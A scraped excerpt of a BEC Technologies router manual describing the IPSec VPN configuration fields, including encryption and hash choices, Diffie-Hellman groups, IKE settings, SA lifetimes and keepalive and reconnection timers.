BEC Technologies 7402GTMR4-SCED Router Manual PDF (Setup & Configuration Guide)

Page 86 / 146 Scroll up to view Page 81 - 85

Chapter 4: Configuration

82

Configure a new VPN Connection

Connection Name:

A user-defined name for the connection (e.g. “connection to office”).

Local:

Network:

Set the IP address, subnet or address range of the local network.

~

Single Address:

The IP address of the local host.

~

Subnet:

The subnet of the local network. For example, IP: 192.168.1.0 with netmask

255.255.255.0 specifies one class C subnet starting from 192.168.1.1 (i.e. 192.168.1.1

through to 192.168.1.254).

~

IP Range:

The IP address range of the local network. For example, IP: 192.168.1.1, end

IP: 192.168.1.10

Remote:

Secure Gateway Address (or Domain Name):

The IP address or hostname of the remote

VPN device that is connected and establishes a VPN tunnel.

Network:

Set the IP address, subnet or address range of the remote network.

Proposal:

Select the IPSec security method. There are two methods of checking the

authentication information, AH (authentication header) and ESP (Encapsulating Security Payload).

Use ESP for greater security so that data will be encrypted and authenticated. Using AH data will

be authenticated but not encrypted.

Authentication:

Authentication establishes the integrity of the datagram and ensures it is not

tampered with in transmit. There are three options, Message Digest 5 (

MD5

), Secure Hash

Algorithm (

SHA1

) or

NONE

. SHA1 is more resistant to brute-force attacks than MD5, however

it is slower.

~

MD5:

A one-way hashing algorithm that produces a 128

−

bit hash.

Page 87 / 146

Chapter 4: Configuration

83

~

SHA1:

A one-way hashing algorithm that produces a 160

−

bit hash.

Encryption:

Select the encryption method from the pull-down menu. There are several

options,

DES

,

3DES

,

AES (128, 192 and 256)

and

NULL

. NULL means it is a tunnel only with

no encryption. 3DES and AES are more powerful but increase latency.

~

DES:

Stands for Data Encryption Standard, it uses 56 bits as an encryption method.

~

3DES:

Stands for Triple Data Encryption Standard, it uses 168 (56*3) bits as an

encryption method.

~

AES:

Stands for Advanced Encryption Standards, you can use 128, 192 or 256 bits as

encryption method.

Perfect Forward Secrecy:

Choose whether to enable PFS using Diffie-Hellman public-key

cryptography to change encryption keys during the second phase of VPN negotiation. This

function will provide better security, but extends the VPN negotiation time. Diffie-Hellman is a

public-key cryptography protocol that allows two parties to establish a shared secret over an

unsecured communication channel (i.e. over the Internet). There are three modes, MODP 768-bit,

MODP 1024-bit and MODP 1536-bit. MODP stands for Modular Exponentiation Groups.

Pre-shared Key:

This is for the Internet Key Exchange (IKE) protocol, a string from 4 to 128

characters. Both sides should use the same key. IKE is used to establish a shared security policy

and authenticated keys for services (such as IPSec) that require a key. Before any IPSec traffic

can be passed, each router must be able to verify the identity of its peer. This can be done by

manually entering the pre-shared key into both sides (router or hosts).

Select the

Apply

button to apply your changes.

Page 88 / 146

Chapter 4: Configuration

84

Advanced Option

This function is only available after completed creating an IPSec account. Click

Advanced Option

to change the following settings:

IKE (Internet key Exchange) Mode:

Select IKE mode to Main mode or Aggressive mode.

This

IKE provides secured key generation and key management.

IKE Proposal:

Hash Function:

It is a Message Digest algorithm which coverts any length of a message into a

unique set of bits.

It is widely used MD5 (Message Digest) and SHA-1 (Secure Hash Algorithm)

algorithms.

SHA1 is more resistant to brute-force attacks than MD5, however it is slower.

~

MD5:

A one-way hashing algorithm that produces a 128

−

bit hash.

~

SHA1:

A one-way hashing algorithm that produces a 160

−

bit hash

Encryption:

Select the encryption method from the pull-down menu. There are several options,

DES

,

3DES

and

AES (128, 192 and 256)

. 3DES and AES are more powerful but increase latency.

Page 89 / 146

Chapter 4: Configuration

85

~

DES:

Stands for Data Encryption Standard, it uses 56 bits as an encryption method.

~

3DES:

Stands for Triple Data Encryption Standard, it uses 168 (56*3) bits as an

encryption method.

~

AES:

Stands for Advanced Encryption Standards, you can use 128, 192 or 256 bits as

encryption method.

Diffie-Hellman Group:

It is a public-key cryptography protocol that allows two parties to establish

a shared secret over an unsecured communication channel (i.e. over the Internet). There are three

modes, MODP 768-bit, MODP 1024-bit and MODP 1536-bit. MODP stands for Modular

Exponentiation Groups.

Local ID:

~

Type:

Specify local ID type.

~

Content:

Input ID’s information, like domain name

www.ipsectest.com

.

Remote ID:

~

Type:

Specify Remote ID type.

~

Identifier:

Input remote ID’s information, like domain name

www.ipsectest.com

.

SA Lifetime:

Specify the number of minutes that a Security Association (SA) will stay active

before new encryption and authentication key will be exchanged. There are two kinds of SAs, IKE

and IPSec. IKE negotiates and establishes SA on behalf of IPSec, an IKE SA is used by IKE.

Phase 1 (IKE):

To issue an initial connection request for a new VPN tunnel. The range can be

from 5 to 15,000 minutes, and the default is 240 minutes.

Phase 2 (IPSec):

To negotiate and establish secure authentication. The range can be from 5 to

15,000 minutes, and the default is 60 minutes.

A short SA time increases security by forcing the two parties to update the keys. However, every

time the VPN tunnel re-negotiates, access through the tunnel will be temporarily disconnected.

PING for Keepalive:

It is used to detect IPSec tunnel connection failure. Connection failure is

defined as abort or in NO response state. In such event Ping to Keepalive takes proper action to

ensure the connection quality of IPSec.

PING to the IP:

It is able to IP Ping the remote PC with the specified IP address and alert when

the connection fails.

Once alter message is received, Router will drop this tunnel connection.

Re-

establish of this connection is required. Default setting is 0.0.0.0 which disables the function.

Internal:

This sets the time interval between

Pings to the IP

function to monitor the connection

status. Default interval setting is 10 seconds.

Time interval can be set from 0 to 3600 second, 0

second disables the function.

Page 90 / 146

Chapter 4: Configuration

86

Ping to the IP

Internal (sec)

Ping to the IP

Action

0.0.0.0

0

No

0.0.0.0

2000

No

xxx.xxx.xxx.xxx (A valid IP Address)

0

No

xxx.xxx.xxx.xxx(A valid IP Address)

2000

Yes, activate it in every 2000

second.

Disconnection Time after no traffic:

It is the NO Response time clock.

When no traffic stage

time is beyond the Disconnection time set, Router will automatically halt the tunnel connection and

re-establish it base on the

Reconnection Time

set. Default setting is

1200 seconds

;

180

seconds

is minimum time interval for this function.

Reconnection Time:

It is the reconnecting time interval after NO TRAFFIC is initiated.

Default

setting is

15 minutes

;

3 minutes

is minimum time interval for this function.

Select the

Apply

button to update the settings.

Rate

Popular BEC Technologies Models

Famous Router IPs

Famous Router Companies

Bookmark Our Site

Share